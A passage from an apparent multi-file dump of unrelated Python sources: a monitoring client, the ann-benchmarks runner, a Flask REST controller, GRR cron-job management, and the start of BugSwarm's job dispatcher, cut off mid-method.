return [-1, -1, -1, -1, '-', -1]
else:
logger.error(f'获取{ip}服务器的{port}端口的gc数据的接口响应状态码为{res.status_code}')
return [-1, -1, -1, -1, '-', -1]
@handle_exception(is_return=True, default_value={'host': [], 'port': [], 'pid': [], 'isRun': [], 'startTime': []})
def get_monitor(self, host=None):
"""
获取监控端口列表接口
:return:
"""
monitor_list = {'host': [], 'port': [], 'pid': [], 'isRun': [], 'startTime': []}
if host:
post_data = {
'host': host,
}
port = self._slaves['port'][self._slaves['ip'].index(host)]
res = self.request.request('post', host, port, 'getMonitor', json=post_data) # 通过url获取
if res.status_code == 200:
response = json.loads(res.content.decode())
logger.debug(f'{host}服务器获取监控列表接口返回值为{response}')
if response['code'] == 0:
# 拼接端口监控列表
monitor_list['host'] += response['data']['host']
monitor_list['port'] += response['data']['port']
monitor_list['pid'] += response['data']['pid']
monitor_list['isRun'] += response['data']['isRun']
monitor_list['startTime'] += response['data']['startTime']
else:
for ip, port in zip(self._slaves['ip'], self._slaves['port']): # 遍历所有客户端IP地址,获取端口监控列表
post_data = {
'host': ip,
}
res = self.request.request('post', ip, port, 'getMonitor', json=post_data) # 通过url获取
if res.status_code == 200:
response = json.loads(res.content.decode())
logger.debug(f'{ip}服务器获取监控列表接口返回值为{response}')
if response['code'] == 0:
# 拼接端口监控列表
monitor_list['host'] += response['data']['host']
monitor_list['port'] += response['data']['port']
monitor_list['pid'] += response['data']['pid']
monitor_list['isRun'] += response['data']['isRun']
monitor_list['startTime'] += response['data']['startTime']
return monitor_list
|
main.py
|
from __future__ import absolute_import
import argparse
import logging
import logging.config
import docker
import multiprocessing.pool
import os
import psutil
import random
import shutil
import sys
import traceback
from ann_benchmarks.datasets import get_dataset, DATASETS
from ann_benchmarks.constants import INDEX_DIR
from ann_benchmarks.algorithms.definitions import (get_definitions,
list_algorithms,
algorithm_status,
InstantiationStatus)
from ann_benchmarks.results import get_result_filename
from ann_benchmarks.runner import run, run_docker
def positive_int(s):
i = None
try:
i = int(s)
except ValueError:
pass
if not i or i < 1:
raise argparse.ArgumentTypeError("%r is not a positive integer" % s)
return i
def run_worker(cpu, args, queue):
while not queue.empty():
definition = queue.get()
if args.local:
run(definition, args.dataset, args.count, args.runs, args.batch)
else:
memory_margin = 500e6 # reserve some extra memory for misc stuff
mem_limit = int((psutil.virtual_memory().available - memory_margin) / args.parallelism)
cpu_limit = str(cpu)
if args.batch:
cpu_limit = "0-%d" % (multiprocessing.cpu_count() - 1)
print("\t\tRunning %s with build=%s and query=%s | %d experiments left" % (definition.algorithm, definition.arguments, definition.query_argument_groups, queue.qsize()))
run_docker(definition, args.dataset, args.count,
args.runs, args.timeout, args.batch, cpu_limit, mem_limit)
def main():
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'--dataset',
metavar='NAME',
help='the dataset to load training points from',
default='glove-100-angular',
choices=DATASETS.keys())
parser.add_argument(
"-k", "--count",
default=10,
type=positive_int,
help="the number of near neighbours to search for")
parser.add_argument(
'--definitions',
metavar='FILE',
help='load algorithm definitions from FILE',
default='algos.yaml')
parser.add_argument(
'--algorithm',
metavar='NAME',
help='run only the named algorithm',
default=None)
parser.add_argument(
'--docker-tag',
metavar='NAME',
help='run only algorithms in a particular docker image',
default=None)
parser.add_argument(
'--list-algorithms',
help='print the names of all known algorithms and exit',
action='store_true')
parser.add_argument(
'--force',
help='re-run algorithms even if their results already exist',
action='store_true')
parser.add_argument(
'--runs',
metavar='COUNT',
type=positive_int,
help='run each algorithm instance %(metavar)s times and use only'
' the best result',
default=5)
parser.add_argument(
'--pin',
metavar='cpu',
type=positive_int,
help='pin process to given cpu',
default=1)
parser.add_argument(
'--timeout',
type=int,
help='Timeout (in seconds) for each individual algorithm run, or -1'
'if no timeout should be set',
default=12 * 3600)
parser.add_argument(
'--local',
action='store_true',
help='If set, then will run everything locally (inside the same '
'process) rather than using Docker')
parser.add_argument(
'--batch',
action='store_true',
help='If set, algorithms get all queries at once')
parser.add_argument(
'--max-n-algorithms',
type=int,
help='Max number of algorithms to run (just used for testing)',
default=-1)
parser.add_argument(
'--run-disabled',
help='run algorithms that are disabled in algos.yml',
action='store_true')
parser.add_argument(
'--parallelism',
type=positive_int,
help='Number of Docker containers in parallel',
default=1)
args = parser.parse_args()
if args.timeout == -1:
args.timeout = None
if args.list_algorithms:
list_algorithms(args.definitions)
sys.exit(0)
logging.config.fileConfig("logging.conf")
logger = logging.getLogger("annb")
# Nmslib specific code
# Remove old indices stored on disk
if os.path.exists(INDEX_DIR):
shutil.rmtree(INDEX_DIR)
dataset = get_dataset(args.dataset)
dimension = len(dataset['train'][0]) # TODO(erikbern): ugly
point_type = dataset.attrs.get('point_type', 'float')
distance = dataset.attrs['distance']
definitions = get_definitions(
args.definitions, dimension, point_type, distance, args.count)
# Filter out, from the loaded definitions, all those query argument groups
# that correspond to experiments that have already been run. (This might
# mean removing a definition altogether, so we can't just use a list
# comprehension.)
filtered_definitions = []
for definition in definitions:
query_argument_groups = definition.query_argument_groups
if not query_argument_groups:
query_argument_groups = [[]]
not_yet_run = []
for query_arguments in query_argument_groups:
fn = get_result_filename(args.dataset,
args.count, definition,
query_arguments, args.batch)
if args.force or not os.path.exists(fn):
not_yet_run.append(query_arguments)
if not_yet_run:
if definition.query_argument_groups:
definition = definition._replace(
query_argument_groups=not_yet_run)
filtered_definitions.append(definition)
definitions = filtered_definitions
random.shuffle(definitions)
if args.algorithm:
logger.info(f'running only {args.algorithm}')
definitions = [d for d in definitions if d.algorithm == args.algorithm]
if not args.local:
# See which Docker images we have available
docker_client = docker.from_env()
docker_tags = set()
for image in docker_client.images.list():
for tag in image.tags:
tag = tag.split(':')[0]
docker_tags.add(tag)
if args.docker_tag:
logger.info(f'running only {args.docker_tag}')
definitions = [
d for d in definitions if d.docker_tag == args.docker_tag]
if set(d.docker_tag for d in definitions).difference(docker_tags):
logger.info(f'not all docker images available, only: {set(docker_tags)}')
logger.info(f'missing docker images: '
f'{str(set(d.docker_tag for d in definitions).difference(docker_tags))}')
definitions = [
d for d in definitions if d.docker_tag in docker_tags]
else:
def _test(df):
status = algorithm_status(df)
# If the module was loaded but doesn't actually have a constructor
# of the right name, then the definition is broken
if status == InstantiationStatus.NO_CONSTRUCTOR:
raise Exception("%s.%s(%s): error: the module '%s' does not"
" expose the named constructor" % (
df.module, df.constructor,
df.arguments, df.module))
if status == InstantiationStatus.NO_MODULE:
# If the module couldn't be loaded (presumably because
# of a missing dependency), print a warning and remove
# this definition from the list of things to be run
logging.warning("%s.%s(%s): the module '%s' could not be "
"loaded; skipping" % (df.module, df.constructor,
df.arguments, df.module))
return False
else:
return True
definitions = [d for d in definitions if _test(d)]
if not args.run_disabled:
if len([d for d in definitions if d.disabled]):
logger.info(f'Not running disabled algorithms {[d for d in definitions if d.disabled]}')
definitions = [d for d in definitions if not d.disabled]
if args.max_n_algorithms >= 0:
definitions = definitions[:args.max_n_algorithms]
if len(definitions) == 0:
raise Exception('Nothing to run')
else:
logger.info(f'Order: {definitions}')
print("\tRunning %d experiments on %s (k=%d)" % (len(definitions), args.dataset, args.count))
if args.parallelism > multiprocessing.cpu_count() - 1:
raise Exception('Parallelism larger than %d! (CPU count minus one)' % (multiprocessing.cpu_count() - 1))
if args.parallelism > 1 and args.pin != 1:
raise Exception('Cannot pin to single CPU if parallism is set')
queue = multiprocessing.Queue()
for definition in definitions:
queue.put(definition)
if args.batch and args.parallelism > 1:
raise Exception(f"Batch mode uses all available CPU resources, --parallelism should be set to 1. (Was: {args.parallelism})")
start_cpu = args.pin
workers = [multiprocessing.Process(target=run_worker, args=(i + args.pin, args, queue))
for i in range(args.parallelism)]
[worker.start() for worker in workers]
[worker.join() for worker in workers]
|
EmRestServer.py
|
#! /usr/bin/env python
# _*_ coding: utf-8 _*_
# Copyright(c) 2019 Nippon Telegraph and Telephone Corporation
# Filename: EmRestServer.py
'''
Rest Server function.
'''
import os
import imp
import traceback
import threading
import functools
import signal
from datetime import datetime, timedelta
from copy import deepcopy
from flask import Flask, request
from flask_cors import CORS
import GlobalModule
from EmCommonLog import decorater_log
from EmCommonLog import decorater_log_in_out
application = Flask(__name__)
CORS(application)
_request_date_list = []
_request_lock = threading.Lock()
@decorater_log_in_out
def get_counter_recv():
_request_lock.acquire()
is_ok, unit_time = (
GlobalModule.EM_CONFIG.read_sys_common_conf("Rest_request_average"))
diffdate = datetime.now() - timedelta(seconds=unit_time)
counter = 0
for timeval in _request_date_list[:]:
counter += 1
if timeval <= diffdate:
break
_request_lock.release()
return counter
def _deco_count_request(func):
'''
Request counter recorder.
'''
@functools.wraps(func)
def wrapper(*args, **kwargs):
_request_counter()
return func(*args, **kwargs)
return wrapper
@decorater_log
def _request_counter(request_date=datetime.now()):
'''
Update request history list.
'''
_request_lock.acquire()
is_ok, unit_time = (
GlobalModule.EM_CONFIG.read_sys_common_conf("Rest_request_average"))
if not is_ok:
GlobalModule.EM_LOGGER.error('310009 REST Count Error')
_request_lock.release()
return False
before_time = request_date + timedelta(seconds=(-1 * unit_time))
global _request_date_list
_request_date_list.append(request_date)
_request_date_list = [
tmp for tmp in deepcopy(_request_date_list) if tmp >= before_time]
_request_lock.release()
return True
@application.route("/v1/internal/em_ctrl/statusget")
@_deco_count_request
def rest_if_statusget():
'''
Controller status acquisition.
Obtain controller status.
Parameter:
key : Key
Return value :
'''
return _execute_rest_api("/v1/internal/em_ctrl/statusget",
request=request,
request_date_list=deepcopy(_request_date_list))
@application.route("/v1/internal/em_ctrl/log")
@_deco_count_request
def rest_if_logget():
'''
Controller log acquisition.
Obtain controller log.
Parameter:
key : Key
Return value :
'''
return _execute_rest_api("/v1/internal/em_ctrl/log",
request=request)
@application.route("/v1/internal/em_ctrl/ctrl-switch", methods=["POST"])
@_deco_count_request
def rest_if_ctrlswitch():
'''
Switches-over controller.
Executes switching-over cotroller.
Parameter:
key : Key
Return value :
'''
return _execute_rest_api("/v1/internal/em_ctrl/ctrl-switch",
request=request)
@application.route("/v1/internal/node_ctrl/<hostname>/neconfigaudit")
@_deco_count_request
def rest_if_device_config_audit(hostname):
'''
Device Config-Audit.
Executes device Config-Audit.
Parameter:
key : Key
Return value :
'''
return _execute_rest_api("/v1/internal/node_ctrl/<hostname>/neconfigaudit",
request=request,
hostname=hostname)
@decorater_log
def _execute_rest_api(rest_uri, *args, **kwargs):
'''
Conduct processing which is common for REST server.
'''
GlobalModule.EM_LOGGER.info(
'110004 Request Received: %s', rest_uri)
try:
scenario_name = _select_rest_scenario(rest_uri)
scenario_ins = _import_scenario_and_get_instance(scenario_name)
response = _execute_scenario(scenario_ins, *args, **kwargs)
except Exception as ex:
raise
return response
@decorater_log
def _select_rest_scenario(rest_uri):
'''
Determin REST scenario to launch.
'''
is_result, rest_scnario = (
GlobalModule.EM_CONFIG.read_scenario_rest_conf(rest_uri))
if not is_result:
GlobalModule.EM_LOGGER.debug(
"REST API cannot get this scenario : %s" % (rest_uri,))
raise KeyError(
"ERROR! REST API unknown scenario : %s" % (rest_uri,))
else:
scenario_name_em = 'Em' + rest_scnario
GlobalModule.EM_LOGGER.debug(
"get scenario result Scenario:%s" % (scenario_name_em,))
return scenario_name_em
@decorater_log
def _import_scenario_and_get_instance(rest_scenario_name):
'''
Read scenario, obtain instance applicable to the class.
'''
GlobalModule.EM_LOGGER.debug(
'startup class name generation:%s', rest_scenario_name)
lib_path = GlobalModule.EM_LIB_PATH
GlobalModule.EM_LOGGER.debug('environment path:%s', lib_path)
filepath, filename, data =\
imp.find_module(
rest_scenario_name, [os.path.join(lib_path, 'RestScenario')])
GlobalModule.EM_LOGGER.debug('search modules')
scenario_mod = imp.load_module(
rest_scenario_name, filepath, filename, data)
GlobalModule.EM_LOGGER.debug('load modules')
scenario_ins = getattr(scenario_mod, rest_scenario_name)()
GlobalModule.EM_LOGGER.debug('instantiation')
return scenario_ins
@decorater_log
def _execute_scenario(scenario_ins, *arg, **kwargs):
'''
Execute scenario.
'''
GlobalModule.EM_LOGGER.debug('execute scenario : %s' % (scenario_ins,))
return scenario_ins.execute(*arg, **kwargs)
class EmRestServer(object):
'''
REST server class
'''
@decorater_log
def __init__(self, address=None, port=None):
'''
Constructor
'''
self._rest_address = address
self._rest_port = port
self.rest_thread = None
@decorater_log_in_out
def start(self):
'''
REST server launching method
'''
self.rest_thread = threading.Thread(target=self._run_server)
self.rest_thread.setDaemon(True)
self.rest_thread.start()
GlobalModule.EM_LOGGER.info("110001 REST Server Start")
return True
@decorater_log
def _run_server(self):
'''
REST server launching method (execute app.run)
'''
application.run(host=self._rest_address, port=self._rest_port,
threaded=True)
|
cronjobs.py
|
#!/usr/bin/env python
"""Cron management classes."""
import logging
import random
import threading
import time
from grr import config
from grr.lib import rdfvalue
from grr.lib import registry
from grr.lib import stats
from grr.lib import utils
from grr.lib.rdfvalues import cronjobs as rdf_cronjobs
from grr.lib.rdfvalues import flows as rdf_flows
from grr.lib.rdfvalues import protodict as rdf_protodict
from grr.lib.rdfvalues import structs as rdf_structs
from grr_response_proto import flows_pb2
from grr.server import access_control
from grr.server import aff4
from grr.server import flow
from grr.server import master
from grr.server import queue_manager
class Error(Exception):
pass
class CreateCronJobFlowArgs(rdf_structs.RDFProtoStruct):
protobuf = flows_pb2.CreateCronJobFlowArgs
rdf_deps = [
rdfvalue.Duration,
rdf_flows.FlowRunnerArgs,
rdfvalue.RDFDatetime,
]
def GetFlowArgsClass(self):
if self.flow_runner_args.flow_name:
flow_cls = flow.GRRFlow.classes.get(self.flow_runner_args.flow_name)
if flow_cls is None:
raise ValueError("Flow '%s' not known by this implementation." %
self.flow_runner_args.flow_name)
# The required protobuf for this class is in args_type.
return flow_cls.args_type
class CronManager(object):
"""CronManager is used to schedule/terminate cron jobs."""
CRON_JOBS_PATH = rdfvalue.RDFURN("aff4:/cron")
def ScheduleFlow(self,
cron_args=None,
job_name=None,
token=None,
disabled=False):
"""Creates a cron job that runs given flow with a given frequency.
Args:
cron_args: A protobuf of type CreateCronJobFlowArgs.
job_name: Use this job_name instead of an autogenerated unique name (used
for system cron jobs - we want them to have well-defined
persistent name).
token: Security token used for data store access.
disabled: If True, the job object will be created, but will be disabled.
Returns:
URN of the cron job created.
"""
if not job_name:
uid = utils.PRNG.GetUShort()
job_name = "%s_%s" % (cron_args.flow_runner_args.flow_name, uid)
cron_job_urn = self.CRON_JOBS_PATH.Add(job_name)
with aff4.FACTORY.Create(
cron_job_urn,
aff4_type=CronJob,
mode="rw",
token=token,
force_new_version=False) as cron_job:
# If the cronjob was already present we don't want to overwrite the
# original start_time.
existing_cron_args = cron_job.Get(cron_job.Schema.CRON_ARGS)
if existing_cron_args and existing_cron_args.start_time:
cron_args.start_time = existing_cron_args.start_time
if cron_args != existing_cron_args:
cron_job.Set(cron_job.Schema.CRON_ARGS(cron_args))
if disabled != cron_job.Get(cron_job.Schema.DISABLED):
cron_job.Set(cron_job.Schema.DISABLED(disabled))
return cron_job_urn
def ListJobs(self, token=None):
"""Returns a generator of URNs of all currently running cron jobs."""
return aff4.FACTORY.Open(self.CRON_JOBS_PATH, token=token).ListChildren()
def EnableJob(self, job_urn, token=None):
"""Enable cron job with the given URN."""
cron_job = aff4.FACTORY.Open(
job_urn, mode="rw", aff4_type=CronJob, token=token)
cron_job.Set(cron_job.Schema.DISABLED(0))
cron_job.Close()
def DisableJob(self, job_urn, token=None):
"""Disable cron job with the given URN."""
cron_job = aff4.FACTORY.Open(
job_urn, mode="rw", aff4_type=CronJob, token=token)
cron_job.Set(cron_job.Schema.DISABLED(1))
cron_job.Close()
def DeleteJob(self, job_urn, token=None):
"""Deletes cron job with the given URN."""
aff4.FACTORY.Delete(job_urn, token=token)
def RunOnce(self, token=None, force=False, urns=None):
"""Tries to lock and run cron jobs.
Args:
token: security token
force: If True, force a run
urns: List of URNs to run. If unset, run them all
"""
urns = urns or self.ListJobs(token=token)
for cron_job_urn in urns:
try:
with aff4.FACTORY.OpenWithLock(
cron_job_urn, blocking=False, token=token,
lease_time=600) as cron_job:
try:
logging.info("Running cron job: %s", cron_job.urn)
cron_job.Run(force=force)
except Exception as e: # pylint: disable=broad-except
logging.exception("Error processing cron job %s: %s", cron_job.urn,
e)
stats.STATS.IncrementCounter("cron_internal_error")
except aff4.LockError:
pass
CRON_MANAGER = CronManager()
class SystemCronFlow(flow.GRRFlow):
"""SystemCronFlows are scheduled automatically on workers startup."""
frequency = rdfvalue.Duration("1d")
lifetime = rdfvalue.Duration("20h")
allow_overruns = False
# By default we randomize the start time of system cron flows between 0 and
# 'frequency' seconds after it is first created. This only affects the very
# first run, after which they will run at 'frequency' intervals. Disable this
# behaviour by setting start_time_randomization = False.
start_time_randomization = True
# Jobs that are broken, or are under development can be disabled using
# the "disabled" attribute. These jobs won't get scheduled automatically,
# and will get paused if they were scheduled before.
disabled = False
__abstract = True # pylint: disable=g-bad-name
def _ValidateState(self):
# For normal flows it's a bug to write an empty state, here it's ok.
pass
class StateReadError(Error):
pass
class StateWriteError(Error):
pass
class StatefulSystemCronFlow(SystemCronFlow):
"""SystemCronFlow that keeps a permanent state between iterations."""
__abstract = True
@property
def cron_job_urn(self):
return CRON_MANAGER.CRON_JOBS_PATH.Add(self.__class__.__name__)
def ReadCronState(self):
try:
cron_job = aff4.FACTORY.Open(
self.cron_job_urn, aff4_type=CronJob, token=self.token)
res = cron_job.Get(cron_job.Schema.STATE_DICT)
if res:
return flow.AttributedDict(res.ToDict())
return flow.AttributedDict()
except aff4.InstantiationError as e:
raise StateReadError(e)
def WriteCronState(self, state):
try:
with aff4.FACTORY.OpenWithLock(
self.cron_job_urn, aff4_type=CronJob, token=self.token) as cron_job:
cron_job.Set(cron_job.Schema.STATE_DICT(state))
except aff4.InstantiationError as e:
raise StateWriteError(e)
def GetStartTime(cron_cls):
"""Get start time for a SystemCronFlow class.
If start_time_randomization is True in the class, randomise the start
time to be between now and (now + frequency)
Args:
cron_cls: SystemCronFlow class
Returns:
rdfvalue.RDFDatetime
"""
if not cron_cls.start_time_randomization:
return rdfvalue.RDFDatetime.Now()
now = rdfvalue.RDFDatetime.Now()
window_ms = cron_cls.frequency.microseconds
start_time_ms = random.randint(now.AsMicroSecondsFromEpoch(),
now.AsMicroSecondsFromEpoch() + window_ms)
return rdfvalue.RDFDatetime(start_time_ms)
def ScheduleSystemCronFlows(names=None, token=None):
"""Schedule all the SystemCronFlows found."""
for name in config.CONFIG["Cron.disabled_system_jobs"]:
try:
cls = flow.GRRFlow.classes[name]
except KeyError:
raise KeyError("No such flow: %s." % name)
if not aff4.issubclass(cls, SystemCronFlow):
raise ValueError("Disabled system cron job name doesn't correspond to "
"a flow inherited from SystemCronFlow: %s" % name)
if names is None:
names = flow.GRRFlow.classes.keys()
for name in names:
cls = flow.GRRFlow.classes[name]
if aff4.issubclass(cls, SystemCronFlow):
cron_args = CreateCronJobFlowArgs(periodicity=cls.frequency)
cron_args.flow_runner_args.flow_name = name
cron_args.lifetime = cls.lifetime
cron_args.allow_overruns = cls.allow_overruns
cron_args.start_time = GetStartTime(cls)
if cls.disabled:
disabled = True
else:
disabled = name in config.CONFIG["Cron.disabled_system_jobs"]
CRON_MANAGER.ScheduleFlow(
cron_args=cron_args, job_name=name, token=token, disabled=disabled)
class CronWorker(object):
"""CronWorker runs a thread that periodically executes cron jobs."""
def __init__(self, thread_name="grr_cron", sleep=60 * 5):
self.thread_name = thread_name
self.sleep = sleep
# SetUID is required to write cronjobs under aff4:/cron/
self.token = access_control.ACLToken(
username="GRRCron", reason="Implied.").SetUID()
def _RunLoop(self):
ScheduleSystemCronFlows(token=self.token)
while True:
if not master.MASTER_WATCHER.IsMaster():
time.sleep(self.sleep)
continue
try:
CRON_MANAGER.RunOnce(token=self.token)
except Exception as e: # pylint: disable=broad-except
logging.error("CronWorker uncaught exception: %s", e)
time.sleep(self.sleep)
def Run(self):
"""Runs a working thread and waits for it to finish."""
self.RunAsync().join()
def RunAsync(self):
"""Runs a working thread and returns immediately."""
self.running_thread = threading.Thread(
name=self.thread_name, target=self._RunLoop)
self.running_thread.daemon = True
self.running_thread.start()
return self.running_thread
class CronJob(aff4.AFF4Volume):
"""AFF4 object corresponding to cron jobs."""
class SchemaCls(aff4.AFF4Volume.SchemaCls):
"""Schema for CronJob AFF4 object."""
CRON_ARGS = aff4.Attribute("aff4:cron/args", CreateCronJobFlowArgs,
"This cron jobs' arguments.")
DISABLED = aff4.Attribute(
"aff4:cron/disabled",
rdfvalue.RDFBool,
"If True, don't run this job.",
versioned=False)
CURRENT_FLOW_URN = aff4.Attribute(
"aff4:cron/current_flow_urn",
rdfvalue.RDFURN,
"URN of the currently running flow corresponding to this cron job.",
versioned=False,
lock_protected=True)
LAST_RUN_TIME = aff4.Attribute(
"aff4:cron/last_run",
rdfvalue.RDFDatetime,
"The last time this cron job ran.",
"last_run",
versioned=False,
lock_protected=True)
LAST_RUN_STATUS = aff4.Attribute(
"aff4:cron/last_run_status",
rdf_cronjobs.CronJobRunStatus,
"Result of the last flow",
lock_protected=True,
creates_new_object_version=False)
STATE_DICT = aff4.Attribute(
"aff4:cron/state_dict",
rdf_protodict.AttributedDict,
"Cron flow state that is kept between iterations",
lock_protected=True,
versioned=False)
def DeleteJobFlows(self, age=None):
"""Deletes flows initiated by the job that are older than specified."""
if age is None:
raise ValueError("age can't be None")
child_flows = list(self.ListChildren(age=age))
with queue_manager.QueueManager(token=self.token) as queuemanager:
queuemanager.MultiDestroyFlowStates(child_flows)
aff4.FACTORY.MultiDelete(child_flows, token=self.token)
def IsRunning(self):
"""Returns True if there's a currently running iteration of this job."""
current_urn = self.Get(self.Schema.CURRENT_FLOW_URN)
if current_urn:
try:
current_flow = aff4.FACTORY.Open(
urn=current_urn, aff4_type=flow.GRRFlow, token=self.token, mode="r")
except aff4.InstantiationError:
# This isn't a flow, something went really wrong, clear it out.
self.DeleteAttribute(self.Schema.CURRENT_FLOW_URN)
self.Flush()
return False
runner = current_flow.GetRunner()
return runner.context.state == rdf_flows.FlowContext.State.RUNNING
return False
def DueToRun(self):
"""Called periodically by the cron daemon, if True Run() will be called.
Returns:
True if it is time to run based on the specified frequency.
"""
if self.Get(self.Schema.DISABLED):
return False
cron_args = self.Get(self.Schema.CRON_ARGS)
last_run_time = self.Get(self.Schema.LAST_RUN_TIME)
now = rdfvalue.RDFDatetime.Now()
# Its time to run.
if (last_run_time is None or
now > cron_args.periodicity.Expiry(last_run_time)):
# Not due to start yet.
if now < cron_args.start_time:
return False
# Do we allow overruns?
if cron_args.allow_overruns:
return True
# No currently executing job - lets go.
if self.Get(self.Schema.CURRENT_FLOW_URN) is None:
return True
return False
def StopCurrentRun(self, reason="Cron lifetime exceeded.", force=True):
current_flow_urn = self.Get(self.Schema.CURRENT_FLOW_URN)
if current_flow_urn:
flow.GRRFlow.TerminateFlow(
current_flow_urn, reason=reason, force=force, token=self.token)
self.Set(
self.Schema.LAST_RUN_STATUS,
rdf_cronjobs.CronJobRunStatus(
status=rdf_cronjobs.CronJobRunStatus.Status.TIMEOUT))
self.DeleteAttribute(self.Schema.CURRENT_FLOW_URN)
self.Flush()
def KillOldFlows(self):
"""Disable cron flow if it has exceeded CRON_ARGS.lifetime.
Returns:
bool: True if the flow is was killed, False if it is still alive
"""
if self.IsRunning():
start_time = self.Get(self.Schema.LAST_RUN_TIME)
lifetime = self.Get(self.Schema.CRON_ARGS).lifetime
elapsed = time.time() - start_time.AsSecondsFromEpoch()
if lifetime and elapsed > lifetime.seconds:
self.StopCurrentRun()
stats.STATS.IncrementCounter(
"cron_job_timeout", fields=[self.urn.Basename()])
stats.STATS.RecordEvent(
"cron_job_latency", elapsed, fields=[self.urn.Basename()])
return True
return False
def Run(self, force=False):
"""Do the actual work of the Cron. Will first check if DueToRun is True.
CronJob object must be locked (i.e. opened via OpenWithLock) for Run() to be
called.
Args:
force: If True, the job will run no matter what (i.e. even if DueToRun()
returns False).
Raises:
LockError: if the object is not locked.
"""
if not self.locked:
raise aff4.LockError("CronJob must be locked for Run() to be called.")
self.KillOldFlows()
# If currently running flow has finished, update our state.
current_flow_urn = self.Get(self.Schema.CURRENT_FLOW_URN)
if current_flow_urn:
current_flow = aff4.FACTORY.Open(current_flow_urn, token=self.token)
runner = current_flow.GetRunner()
if not runner.IsRunning():
if runner.context.state == rdf_flows.FlowContext.State.ERROR:
self.Set(
self.Schema.LAST_RUN_STATUS,
rdf_cronjobs.CronJobRunStatus(
status=rdf_cronjobs.CronJobRunStatus.Status.ERROR))
stats.STATS.IncrementCounter(
"cron_job_failure", fields=[self.urn.Basename()])
else:
self.Set(
self.Schema.LAST_RUN_STATUS,
rdf_cronjobs.CronJobRunStatus(
status=rdf_cronjobs.CronJobRunStatus.Status.OK))
start_time = self.Get(self.Schema.LAST_RUN_TIME)
elapsed = time.time() - start_time.AsSecondsFromEpoch()
stats.STATS.RecordEvent(
"cron_job_latency", elapsed, fields=[self.urn.Basename()])
self.DeleteAttribute(self.Schema.CURRENT_FLOW_URN)
self.Flush()
if not force and not self.DueToRun():
return
# Make sure the flow is created with cron job as a parent folder.
cron_args = self.Get(self.Schema.CRON_ARGS)
cron_args.flow_runner_args.base_session_id = self.urn
flow_urn = flow.GRRFlow.StartFlow(
runner_args=cron_args.flow_runner_args,
args=cron_args.flow_args,
token=self.token,
sync=False)
self.Set(self.Schema.CURRENT_FLOW_URN, flow_urn)
self.Set(self.Schema.LAST_RUN_TIME, rdfvalue.RDFDatetime.Now())
self.Flush()
class CronHook(registry.InitHook):
pre = [aff4.AFF4InitHook, master.MasterInit]
def RunOnce(self):
"""Main CronHook method."""
stats.STATS.RegisterCounterMetric("cron_internal_error")
stats.STATS.RegisterCounterMetric(
"cron_job_failure", fields=[("cron_job_name", str)])
stats.STATS.RegisterCounterMetric(
"cron_job_timeout", fields=[("cron_job_name", str)])
stats.STATS.RegisterEventMetric(
"cron_job_latency", fields=[("cron_job_name", str)])
# Start the cron thread if configured to.
if config.CONFIG["Cron.active"]:
self.cron_worker = CronWorker()
self.cron_worker.RunAsync()
|
job_dispatcher.py
|
import os
import time
from multiprocessing import Lock
from multiprocessing import Manager
from multiprocessing import Process
from multiprocessing import Value
from typing import Optional
from bugswarm.common import log
from bugswarm.common.json import read_json
from termcolor import colored
from reproducer.config import Config
from reproducer.docker_wrapper import DockerWrapper
from reproducer.pair_center import PairCenter
from reproducer.reproduce_exception import ReproduceError
from reproducer.utils import Utils
class JobDispatcher(object):
"""
JobDispatcher controls the entire reproducing workflow by dispatching tasks to a pool of worker threads.
Subclasses determine the specific task.
"""
def __init__(self, input_file, task_name, threads=1, keep=False, package_mode=False, dependency_solver=False):
"""
Initializes JobDispatcher with user specified input and starts work.
If `threads` is specified, JobDispatcher will dispatch jobs to be reproduced in each thread. Otherwise, each job
will be reproduced sequentially.
"""
log.info('Initializing job dispatcher.')
self.input_file = input_file
self.thread_num = threads
self.keep = keep
self.package_mode = package_mode
self.dependency_solver = dependency_solver
# -----
self.config = Config(task_name)
self.utils = Utils(self.config)
self.items_processed = Value('i', 0)
self.reproduce_err = Value('i', 0)
self.job_time_acc = 0
self.start_time = time.time()
self.docker = DockerWrapper(self.utils)
self.docker_storage_path = self.docker.setup_docker_storage_path()
self.terminate = Value('i', 0)
self.manager = Manager()
self.lock = Lock()
self.workspace_locks = self.manager.dict()
self.cloned_repos = self.manager.dict()
self.threads = {}
self.error_reasons = {}
self.alive_threads = 0
self.travis_images = None
self.job_center = PairCenter(self.input_file, self.utils, self.package_mode)
def run(self):
"""
The entry point for reproducing jobs. Calls post_run() after all items are processed.
Subclasses must not override this method.
"""
self._base_pre_run()
self.pre_run()
try:
while self.job_center.get_num_remaining_items(self.package_mode):
log.info('Ready to initialize threads.')
if not self.utils.check_disk_space_available():
self.utils.clean_disk_usage(self)
if not self.utils.check_disk_space_available():
msg = 'Still inadequate disk space after removing temporary Reproducer files. Exiting.'
log.error(msg)
raise OSError(msg)
if not self.utils.check_docker_disk_space_available(self.docker_storage_path):
self.utils.clean_docker_disk_usage(self.docker)
if not self.utils.check_docker_disk_space_available(self.docker_storage_path):
msg = 'Still inadequate disk space after removing inactive Docker Images. Exiting.'
log.error(msg)
raise OSError(msg)
self._init_threads()
except KeyboardInterrupt:
log.info('Caught KeyboardInterrupt. Cleaning up before terminating.')
self.terminate.value = 1
else:
self.post_run()
log.info('Done!')
finally:
log.info(self.progress_str())
def _spawn(self, tid):
t = Process(target=self._thread_main, args=(tid,))
thread = {'process': t, 'exit_reason': ''}
self.threads[tid] = thread
t.start()
def _thread_watcher(self):
"""
Repeatedly check if process is alive.
"""
log.info('Initialized', len(self.threads), 'threads.')
count = 0
old_str = self.progress_str()
while True:
time.sleep(3)
count += 1
if count == 6:
count = 0
self.update_local_files() # Update local files every 3*6 seconds.
if self.terminate.value:
log.info(colored('Waiting for threads...', 'blue'))
# elif not self.utils.check_disk_space_available():
# log.warning(colored('Not enough disk space. Joining threads...', 'yellow'))
# self.terminate.value = 1
alive_threads = 0
for tid in self.threads:
p = self.threads[tid]['process']
if p.is_alive():
alive_threads += 1
else:
if p.exitcode is None: # Not finished and not running.
# Do error handling and restarting here assigning the new process to processes[n].
self.threads[tid]['exit_reason'] = 'not finished and not running'
self._spawn(tid)
elif p.exitcode != 0:
self.threads[tid]['exit_reason'] = 'errored or terminated'
# Handle this either by restarting or deleting the entry so it is removed from list.
self._spawn(tid)
else:
self.threads[tid]['exit_reason'] = 'finished'
self.terminate.value = 1
p.join() # Allow cleanup.
self.alive_threads = alive_threads
if not alive_threads:
break
curr_str = self.progress_str()
if curr_str != old_str:
old_str = curr_str
if curr_str:
log.info(curr_str)
def _init_threads(self):
"""
